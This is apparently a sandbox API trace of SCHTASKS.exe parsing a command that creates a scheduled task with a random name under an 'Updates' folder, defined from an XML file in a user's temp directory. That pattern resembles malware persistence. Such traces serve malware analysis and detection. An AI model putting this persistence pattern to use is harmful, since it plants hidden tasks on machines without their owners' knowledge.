[0153.996] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x14) returned 0x295320
[0153.996] GetProcessHeap () returned 0x280000
[0153.996] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x10) returned 0x294cc8
[0153.996] _memicmp (_Buf1=0x294cc8, _Buf2=0x771ed8, _Size=0x7) returned 0
[0153.996] GetProcessHeap () returned 0x280000
[0153.996] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x200) returned 0x296760
[0153.997] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x296760, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17
[0153.997] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23
[0153.997] GetProcessHeap () returned 0x280000
[0153.997] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x30) returned 0x296968
[0153.997] _vsnwprintf (in: _Buffer=0x2966b8, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0xdf6a4 | out: _Buffer="Type \"SCHTASKS /?\" for usage.") returned 29
[0153.997] GetProcessHeap () returned 0x280000
[0153.997] GetProcessHeap () returned 0x280000
[0153.997] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295cd8) returned 1
[0153.997] GetProcessHeap () returned 0x280000
[0153.997] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295cd8) returned 0x74e
[0153.998] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x295cd8 | out: hHeap=0x280000) returned 1
[0153.998] SetLastError (dwErrCode=0x0)
[0153.998] GetThreadLocale () returned 0x409
[0153.998] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0153.998] lstrlenW (lpString="?") returned 1
[0153.998] GetThreadLocale () returned 0x409
[0153.998] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0153.998] lstrlenW (lpString="create") returned 6
[0153.998] GetThreadLocale () returned 0x409
[0153.998] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0153.998] lstrlenW (lpString="delete") returned 6
[0153.998] GetThreadLocale () returned 0x409
[0153.998] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0153.998] lstrlenW (lpString="query") returned 5
[0153.999] GetThreadLocale () returned 0x409
[0153.999] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0153.999] lstrlenW (lpString="change") returned 6
[0153.999] GetThreadLocale () returned 0x409
[0153.999] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0153.999] lstrlenW (lpString="run") returned 3
[0153.999] GetThreadLocale () returned 0x409
[0153.999] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0153.999] lstrlenW (lpString="end") returned 3
[0153.999] GetThreadLocale () returned 0x409
[0153.999] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0153.999] lstrlenW (lpString="showsid") returned 7
[0153.999] GetThreadLocale () returned 0x409
[0153.999] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0153.999] SetLastError (dwErrCode=0x0)
[0153.999] SetLastError (dwErrCode=0x0)
[0153.999] lstrlenW (lpString="/Create") returned 7
[0153.999] lstrlenW (lpString="-/") returned 2
[0153.999] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0153.999] lstrlenW (lpString="?") returned 1
[0153.999] lstrlenW (lpString="?") returned 1
[0153.999] GetProcessHeap () returned 0x280000
[0153.999] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x10) returned 0x294ce0
[0153.999] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0153.999] GetProcessHeap () returned 0x280000
[0153.999] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0xa) returned 0x294cf8
[0153.999] lstrlenW (lpString="Create") returned 6
[0153.999] GetProcessHeap () returned 0x280000
[0154.000] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x10) returned 0x294d10
[0154.000] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.000] GetProcessHeap () returned 0x280000
[0154.000] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x14) returned 0x295340
[0154.000] _vsnwprintf (in: _Buffer=0x294cf8, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdf68c | out: _Buffer="|?|") returned 3
[0154.000] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdf68c | out: _Buffer="|Create|") returned 8
[0154.000] lstrlenW (lpString="|?|") returned 3
[0154.000] lstrlenW (lpString="|Create|") returned 8
[0154.000] SetLastError (dwErrCode=0x490)
[0154.000] lstrlenW (lpString="create") returned 6
[0154.000] lstrlenW (lpString="create") returned 6
[0154.000] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.000] GetProcessHeap () returned 0x280000
[0154.000] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x294cf8) returned 1
[0154.000] GetProcessHeap () returned 0x280000
[0154.000] RtlReAllocateHeap (Heap=0x280000, Flags=0xc, Ptr=0x294cf8, Size=0x14) returned 0x295360
[0154.000] lstrlenW (lpString="Create") returned 6
[0154.000] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.000] _vsnwprintf (in: _Buffer=0x295360, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdf68c | out: _Buffer="|create|") returned 8
[0154.000] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdf68c | out: _Buffer="|Create|") returned 8
[0154.000] lstrlenW (lpString="|create|") returned 8
[0154.000] lstrlenW (lpString="|Create|") returned 8
[0154.001] StrStrIW (lpFirst="|create|", lpSrch="|Create|") returned="|create|"
[0154.001] SetLastError (dwErrCode=0x0)
[0154.001] SetLastError (dwErrCode=0x0)
[0154.001] SetLastError (dwErrCode=0x0)
[0154.001] lstrlenW (lpString="/TN") returned 3
[0154.001] lstrlenW (lpString="-/") returned 2
[0154.001] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0154.001] lstrlenW (lpString="?") returned 1
[0154.001] lstrlenW (lpString="?") returned 1
[0154.001] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.001] lstrlenW (lpString="TN") returned 2
[0154.001] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.001] _vsnwprintf (in: _Buffer=0x295360, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdf68c | out: _Buffer="|?|") returned 3
[0154.001] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdf68c | out: _Buffer="|TN|") returned 4
[0154.001] lstrlenW (lpString="|?|") returned 3
[0154.001] lstrlenW (lpString="|TN|") returned 4
[0154.001] SetLastError (dwErrCode=0x490)
[0154.001] lstrlenW (lpString="create") returned 6
[0154.001] lstrlenW (lpString="create") returned 6
[0154.001] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.002] lstrlenW (lpString="TN") returned 2
[0154.002] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.002] _vsnwprintf (in: _Buffer=0x295360, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdf68c | out: _Buffer="|create|") returned 8
[0154.002] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdf68c | out: _Buffer="|TN|") returned 4
[0154.002] lstrlenW (lpString="|create|") returned 8
[0154.002] lstrlenW (lpString="|TN|") returned 4
[0154.002] StrStrIW (lpFirst="|create|", lpSrch="|TN|") returned 0x0
[0154.002] SetLastError (dwErrCode=0x490)
[0154.002] lstrlenW (lpString="delete") returned 6
[0154.002] lstrlenW (lpString="delete") returned 6
[0154.002] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.002] lstrlenW (lpString="TN") returned 2
[0154.002] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.002] _vsnwprintf (in: _Buffer=0x295360, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdf68c | out: _Buffer="|delete|") returned 8
[0154.002] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdf68c | out: _Buffer="|TN|") returned 4
[0154.002] lstrlenW (lpString="|delete|") returned 8
[0154.002] lstrlenW (lpString="|TN|") returned 4
[0154.002] StrStrIW (lpFirst="|delete|", lpSrch="|TN|") returned 0x0
[0154.002] SetLastError (dwErrCode=0x490)
[0154.002] lstrlenW (lpString="query") returned 5
[0154.002] lstrlenW (lpString="query") returned 5
[0154.002] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.002] lstrlenW (lpString="TN") returned 2
[0154.002] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.003] _vsnwprintf (in: _Buffer=0x295360, _BufferCount=0x8, _Format="|%s|", _ArgList=0xdf68c | out: _Buffer="|query|") returned 7
[0154.003] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdf68c | out: _Buffer="|TN|") returned 4
[0154.003] lstrlenW (lpString="|query|") returned 7
[0154.003] lstrlenW (lpString="|TN|") returned 4
[0154.003] StrStrIW (lpFirst="|query|", lpSrch="|TN|") returned 0x0
[0154.003] SetLastError (dwErrCode=0x490)
[0154.003] lstrlenW (lpString="change") returned 6
[0154.003] lstrlenW (lpString="change") returned 6
[0154.003] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.003] lstrlenW (lpString="TN") returned 2
[0154.003] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.003] _vsnwprintf (in: _Buffer=0x295360, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdf68c | out: _Buffer="|change|") returned 8
[0154.003] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdf68c | out: _Buffer="|TN|") returned 4
[0154.003] lstrlenW (lpString="|change|") returned 8
[0154.003] lstrlenW (lpString="|TN|") returned 4
[0154.003] StrStrIW (lpFirst="|change|", lpSrch="|TN|") returned 0x0
[0154.003] SetLastError (dwErrCode=0x490)
[0154.003] lstrlenW (lpString="run") returned 3
[0154.003] lstrlenW (lpString="run") returned 3
[0154.003] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.003] lstrlenW (lpString="TN") returned 2
[0154.003] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.003] _vsnwprintf (in: _Buffer=0x295360, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdf68c | out: _Buffer="|run|") returned 5
[0154.004] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdf68c | out: _Buffer="|TN|") returned 4
[0154.004] lstrlenW (lpString="|run|") returned 5
[0154.004] lstrlenW (lpString="|TN|") returned 4
[0154.004] StrStrIW (lpFirst="|run|", lpSrch="|TN|") returned 0x0
[0154.004] SetLastError (dwErrCode=0x490)
[0154.004] lstrlenW (lpString="end") returned 3
[0154.004] lstrlenW (lpString="end") returned 3
[0154.004] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.004] lstrlenW (lpString="TN") returned 2
[0154.004] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.004] _vsnwprintf (in: _Buffer=0x295360, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdf68c | out: _Buffer="|end|") returned 5
[0154.004] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdf68c | out: _Buffer="|TN|") returned 4
[0154.004] lstrlenW (lpString="|end|") returned 5
[0154.004] lstrlenW (lpString="|TN|") returned 4
[0154.004] StrStrIW (lpFirst="|end|", lpSrch="|TN|") returned 0x0
[0154.004] SetLastError (dwErrCode=0x490)
[0154.004] lstrlenW (lpString="showsid") returned 7
[0154.004] lstrlenW (lpString="showsid") returned 7
[0154.004] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.004] GetProcessHeap () returned 0x280000
[0154.004] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295360) returned 1
[0154.004] GetProcessHeap () returned 0x280000
[0154.004] RtlReAllocateHeap (Heap=0x280000, Flags=0xc, Ptr=0x295360, Size=0x16) returned 0x295380
[0154.004] lstrlenW (lpString="TN") returned 2
[0154.004] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.004] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0xa, _Format="|%s|", _ArgList=0xdf68c | out: _Buffer="|showsid|") returned 9
[0154.005] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdf68c | out: _Buffer="|TN|") returned 4
[0154.005] lstrlenW (lpString="|showsid|") returned 9
[0154.005] lstrlenW (lpString="|TN|") returned 4
[0154.005] StrStrIW (lpFirst="|showsid|", lpSrch="|TN|") returned 0x0
[0154.005] SetLastError (dwErrCode=0x490)
[0154.005] SetLastError (dwErrCode=0x490)
[0154.005] SetLastError (dwErrCode=0x0)
[0154.005] lstrlenW (lpString="/TN") returned 3
[0154.005] StrChrIW (lpStart="/TN", wMatch=0x3a) returned 0x0
[0154.005] SetLastError (dwErrCode=0x490)
[0154.005] SetLastError (dwErrCode=0x0)
[0154.005] lstrlenW (lpString="/TN") returned 3
[0154.005] GetProcessHeap () returned 0x280000
[0154.005] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x8) returned 0x2969a0
[0154.005] GetProcessHeap () returned 0x280000
[0154.005] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x14) returned 0x295360
[0154.005] SetLastError (dwErrCode=0x0)
[0154.005] SetLastError (dwErrCode=0x0)
[0154.005] lstrlenW (lpString="Updates\\nFxIoujoILCO") returned 20
[0154.005] lstrlenW (lpString="-/") returned 2
[0154.005] StrChrIW (lpStart="-/", wMatch=0x55) returned 0x0
[0154.005] SetLastError (dwErrCode=0x490)
[0154.005] SetLastError (dwErrCode=0x490)
[0154.005] SetLastError (dwErrCode=0x0)
[0154.005] lstrlenW (lpString="Updates\\nFxIoujoILCO") returned 20
[0154.005] StrChrIW (lpStart="Updates\\nFxIoujoILCO", wMatch=0x3a) returned 0x0
[0154.005] SetLastError (dwErrCode=0x490)
[0154.005] SetLastError (dwErrCode=0x0)
[0154.005] lstrlenW (lpString="Updates\\nFxIoujoILCO") returned 20
[0154.006] GetProcessHeap () returned 0x280000
[0154.006] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x2a) returned 0x2969b0
[0154.006] GetProcessHeap () returned 0x280000
[0154.006] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x14) returned 0x2953a0
[0154.006] SetLastError (dwErrCode=0x0)
[0154.006] SetLastError (dwErrCode=0x0)
[0154.006] lstrlenW (lpString="/XML") returned 4
[0154.006] lstrlenW (lpString="-/") returned 2
[0154.006] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0154.006] lstrlenW (lpString="?") returned 1
[0154.006] lstrlenW (lpString="?") returned 1
[0154.006] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.006] lstrlenW (lpString="XML") returned 3
[0154.006] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.006] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdf68c | out: _Buffer="|?|") returned 3
[0154.006] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdf68c | out: _Buffer="|XML|") returned 5
[0154.006] lstrlenW (lpString="|?|") returned 3
[0154.006] lstrlenW (lpString="|XML|") returned 5
[0154.006] SetLastError (dwErrCode=0x490)
[0154.006] lstrlenW (lpString="create") returned 6
[0154.006] lstrlenW (lpString="create") returned 6
[0154.006] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.006] lstrlenW (lpString="XML") returned 3
[0154.006] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.006] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdf68c | out: _Buffer="|create|") returned 8
[0154.006] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdf68c | out: _Buffer="|XML|") returned 5
[0154.006] lstrlenW (lpString="|create|") returned 8
[0154.007] lstrlenW (lpString="|XML|") returned 5
[0154.007] StrStrIW (lpFirst="|create|", lpSrch="|XML|") returned 0x0
[0154.007] SetLastError (dwErrCode=0x490)
[0154.007] lstrlenW (lpString="delete") returned 6
[0154.007] lstrlenW (lpString="delete") returned 6
[0154.007] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.007] lstrlenW (lpString="XML") returned 3
[0154.007] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.007] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdf68c | out: _Buffer="|delete|") returned 8
[0154.007] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdf68c | out: _Buffer="|XML|") returned 5
[0154.007] lstrlenW (lpString="|delete|") returned 8
[0154.007] lstrlenW (lpString="|XML|") returned 5
[0154.007] StrStrIW (lpFirst="|delete|", lpSrch="|XML|") returned 0x0
[0154.007] SetLastError (dwErrCode=0x490)
[0154.007] lstrlenW (lpString="query") returned 5
[0154.007] lstrlenW (lpString="query") returned 5
[0154.007] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.007] lstrlenW (lpString="XML") returned 3
[0154.007] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.007] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x8, _Format="|%s|", _ArgList=0xdf68c | out: _Buffer="|query|") returned 7
[0154.007] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdf68c | out: _Buffer="|XML|") returned 5
[0154.007] lstrlenW (lpString="|query|") returned 7
[0154.007] lstrlenW (lpString="|XML|") returned 5
[0154.007] StrStrIW (lpFirst="|query|", lpSrch="|XML|") returned 0x0
[0154.007] SetLastError (dwErrCode=0x490)
[0154.007] lstrlenW (lpString="change") returned 6
[0154.008] lstrlenW (lpString="change") returned 6
[0154.008] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.008] lstrlenW (lpString="XML") returned 3
[0154.008] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.008] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdf68c | out: _Buffer="|change|") returned 8
[0154.008] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdf68c | out: _Buffer="|XML|") returned 5
[0154.008] lstrlenW (lpString="|change|") returned 8
[0154.008] lstrlenW (lpString="|XML|") returned 5
[0154.008] StrStrIW (lpFirst="|change|", lpSrch="|XML|") returned 0x0
[0154.008] SetLastError (dwErrCode=0x490)
[0154.008] lstrlenW (lpString="run") returned 3
[0154.008] lstrlenW (lpString="run") returned 3
[0154.008] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.008] lstrlenW (lpString="XML") returned 3
[0154.008] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.008] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdf68c | out: _Buffer="|run|") returned 5
[0154.008] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdf68c | out: _Buffer="|XML|") returned 5
[0154.008] lstrlenW (lpString="|run|") returned 5
[0154.008] lstrlenW (lpString="|XML|") returned 5
[0154.008] StrStrIW (lpFirst="|run|", lpSrch="|XML|") returned 0x0
[0154.008] SetLastError (dwErrCode=0x490)
[0154.008] lstrlenW (lpString="end") returned 3
[0154.008] lstrlenW (lpString="end") returned 3
[0154.008] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.008] lstrlenW (lpString="XML") returned 3
[0154.009] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.009] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdf68c | out: _Buffer="|end|") returned 5
[0154.009] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdf68c | out: _Buffer="|XML|") returned 5
[0154.009] lstrlenW (lpString="|end|") returned 5
[0154.009] lstrlenW (lpString="|XML|") returned 5
[0154.009] StrStrIW (lpFirst="|end|", lpSrch="|XML|") returned 0x0
[0154.009] SetLastError (dwErrCode=0x490)
[0154.009] lstrlenW (lpString="showsid") returned 7
[0154.009] lstrlenW (lpString="showsid") returned 7
[0154.009] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.009] lstrlenW (lpString="XML") returned 3
[0154.009] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.009] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0xa, _Format="|%s|", _ArgList=0xdf68c | out: _Buffer="|showsid|") returned 9
[0154.009] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdf68c | out: _Buffer="|XML|") returned 5
[0154.009] lstrlenW (lpString="|showsid|") returned 9
[0154.009] lstrlenW (lpString="|XML|") returned 5
[0154.009] StrStrIW (lpFirst="|showsid|", lpSrch="|XML|") returned 0x0
[0154.009] SetLastError (dwErrCode=0x490)
[0154.009] SetLastError (dwErrCode=0x490)
[0154.009] SetLastError (dwErrCode=0x0)
[0154.009] lstrlenW (lpString="/XML") returned 4
[0154.009] StrChrIW (lpStart="/XML", wMatch=0x3a) returned 0x0
[0154.009] SetLastError (dwErrCode=0x490)
[0154.009] SetLastError (dwErrCode=0x0)
[0154.009] lstrlenW (lpString="/XML") returned 4
[0154.010] GetProcessHeap () returned 0x280000
[0154.010] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0xa) returned 0x294cf8
[0154.010] GetProcessHeap () returned 0x280000
[0154.010] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x14) returned 0x2953c0
[0154.010] SetLastError (dwErrCode=0x0)
[0154.010] SetLastError (dwErrCode=0x0)
[0154.010] lstrlenW (lpString="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpC690.tmp") returned 49
[0154.010] lstrlenW (lpString="-/") returned 2
[0154.010] StrChrIW (lpStart="-/", wMatch=0x43) returned 0x0
[0154.010] SetLastError (dwErrCode=0x490)
[0154.010] SetLastError (dwErrCode=0x490)
[0154.010] SetLastError (dwErrCode=0x0)
[0154.010] lstrlenW (lpString="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpC690.tmp") returned 49
[0154.010] StrChrIW (lpStart="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpC690.tmp", wMatch=0x3a) returned=":\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpC690.tmp"
[0154.010] lstrlenW (lpString="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpC690.tmp") returned 49
[0154.010] GetProcessHeap () returned 0x280000
[0154.010] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x10) returned 0x294d28
[0154.027] _memicmp (_Buf1=0x294d28, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.027] GetProcessHeap () returned 0x280000
[0154.027] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0xc) returned 0x294d40
[0154.027] GetProcessHeap () returned 0x280000
[0154.027] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x10) returned 0x294d58
[0154.027] _memicmp (_Buf1=0x294d58, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.027] GetProcessHeap () returned 0x280000
[0154.027] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x68) returned 0x2969e8
[0154.027] SetLastError (dwErrCode=0x7a)
[0154.027] SetLastError (dwErrCode=0x0)
[0154.027] SetLastError (dwErrCode=0x0)
[0154.027] lstrlenW (lpString="C") returned 1
[0154.027] SetLastError (dwErrCode=0x490)
[0154.027] SetLastError (dwErrCode=0x0)
[0154.027] lstrlenW (lpString="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpC690.tmp") returned 49
[0154.027] GetProcessHeap () returned 0x280000
[0154.027] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x64) returned 0x296a58
[0154.027] GetProcessHeap () returned 0x280000
[0154.027] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x14) returned 0x2953e0
[0154.027] SetLastError (dwErrCode=0x0)
[0154.027] GetProcessHeap () returned 0x280000
[0154.027] GetProcessHeap () returned 0x280000
[0154.027] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x2969a0) returned 1
[0154.027] GetProcessHeap () returned 0x280000
[0154.027] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x2969a0) returned 0x8
[0154.027] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2969a0 | out: hHeap=0x280000) returned 1
[0154.028] GetProcessHeap () returned 0x280000
[0154.028] GetProcessHeap () returned 0x280000
[0154.028] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295360) returned 1
[0154.028] GetProcessHeap () returned 0x280000
[0154.028] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295360) returned 0x14
[0154.028] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x295360 | out: hHeap=0x280000) returned 1
[0154.028] GetProcessHeap () returned 0x280000
[0154.028] GetProcessHeap () returned 0x280000
[0154.028] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x2969b0) returned 1
[0154.028] GetProcessHeap () returned 0x280000
[0154.028] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x2969b0) returned 0x2a
[0154.029] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2969b0 | out: hHeap=0x280000) returned 1
[0154.029] GetProcessHeap () returned 0x280000
[0154.029] GetProcessHeap () returned 0x280000
[0154.029] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x2953a0) returned 1
[0154.029] GetProcessHeap () returned 0x280000
[0154.029] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x2953a0) returned 0x14
[0154.029] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2953a0 | out: hHeap=0x280000) returned 1
[0154.029] GetProcessHeap () returned 0x280000
[0154.029] GetProcessHeap () returned 0x280000
[0154.029] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x294cf8) returned 1
[0154.029] GetProcessHeap () returned 0x280000
[0154.029] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x294cf8) returned 0xa
[0154.029] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x294cf8 | out: hHeap=0x280000) returned 1
[0154.029] GetProcessHeap () returned 0x280000
[0154.029] GetProcessHeap () returned 0x280000
[0154.029] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x2953c0) returned 1
[0154.029] GetProcessHeap () returned 0x280000
[0154.029] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x2953c0) returned 0x14
[0154.029] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2953c0 | out: hHeap=0x280000) returned 1
[0154.029] GetProcessHeap () returned 0x280000
[0154.029] GetProcessHeap () returned 0x280000
[0154.029] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x296a58) returned 1
